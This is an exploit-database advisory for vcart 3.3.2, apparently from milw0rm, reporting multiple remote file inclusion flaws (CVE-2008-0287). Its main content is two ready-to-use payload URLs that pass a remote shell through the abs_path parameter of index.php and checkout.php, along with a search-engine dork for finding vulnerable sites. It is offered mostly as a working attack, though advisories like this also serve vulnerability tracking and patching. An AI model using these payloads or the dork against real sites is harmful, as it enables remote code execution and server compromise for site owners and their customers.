[] NeoSense

vcart 3.3.2 - Multiple Remote File Inclusions

Author: k1n9k0ng
type: webapps
platform: php
port: 
date_added: 2008-01-10 
date_updated:  
verified: 1 
codes: OSVDB-40260;CVE-2008-0287;OSVDB-40259 
tags: 
aliases:  
screenshot_url:  
application_url: 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Scripts         : vcart version 3.3.2
Discovered By   : k1n9k0ng
Scripts site    : http://www.visionburst.com/
Thanks To       : #sekuritionline, #semprol, #bajingan, #mimid, #r.i.p, #x-code, #yogyafree
special To      : adhietslank, sukam, cyberlog, cah_gemblunkz, the_sims, aRiee, letjen, k1tk4t
site            : www.sekuritionline.net
dork        : Powered by "vcart 3.3.2"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

bug found:
"http://www.site.net/index.php?abs_path=[shell]"
"http://www.site.net/checkout.php?abs_path=[shell]"

# milw0rm.com [2008-01-11]